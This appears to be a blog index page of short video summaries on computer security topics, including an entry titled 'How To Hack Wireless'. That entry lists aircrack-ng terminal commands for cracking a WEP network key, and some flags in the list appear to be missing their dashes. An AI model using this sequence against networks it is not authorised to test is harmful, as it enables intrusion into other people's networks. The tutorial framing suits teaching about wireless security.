Tinkernut Labs



  • Weekend Hacker: Make A Secret Encrypted Drive

    May 18, 2012 // davisde // Safety & Security Tags: decrypt, documents, encrypt, government, hidden, hide, password, protect, safe, secret, secure, truecrypt 14 Responses


    Make sure your private documents are completely secure. This episode deals with not only encrypting your files, but also hiding them in a hidden volume.
    Links used in this video:
    http://www.truecrypt.org
  • How To Protect Your Website

    April 28, 2010 // davisde // Web Tips Tags: gfi, hackers, protect, scan, security, webmaster, website 4 Responses






    This video will show you how to monitor and protect your website.

    http://www.247webmonitoring.com/

    http://www.gfi.com/it-managed-services-software

    http://www.avg.com.au/resources/web-page-scanner/

    http://sucuri.net/index.php?page=home

  • How To Hack Wireless

    January 27, 2010 // davisde // Hacks, Web Tips Tags: free, hack, hackers, hacking, linux, protect, protection, steal, tinkernut, tips, tricks, tutorial, wi-fi, wifi, wireless 51 Responses


    This video shows one method of hacking a wireless WEP connection and gives you some tips on how to better secure your wireless.

    WEBSITES:
    http://www.backtrack-linux.org
    http://www.imgburn.com

    TERMINAL COMMANDS:
    Startx
    /etc/init.d/networking start
    airmon-ng
    airmon-ng stop [wireless card name]
    airmon-ng start [wireless card name]
    airmon-ng
    airodump-ng [wireless card name]
    ctrl c
    airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name]
    aireplay-ng -1 0 a [bssid] [wireless card name]
    aireplay-ng -3 b [bssid][wireless card name]
    ctrl + c
    dir
    aircrack-ng [filename]

  • Best Virus Scanner?

    September 26, 2009 // davisde // Safety & Security, Software Tips Tags: protect, secure, tinkernut, tricks, tutorial, virus 5 Responses






    This video compares the most popular virus scanners to see which one’s are the best.

  • Make Your Own Backup Program

    June 30, 2008 // davisde // Safety & Security, Video Tags: backup, diy, files, hardware, program, programming, protect, safety, software, tips, tricks, tutorial, virus 5 Responses


    This video will show you a quick little script that you can write that allows you to make your own backup program.Â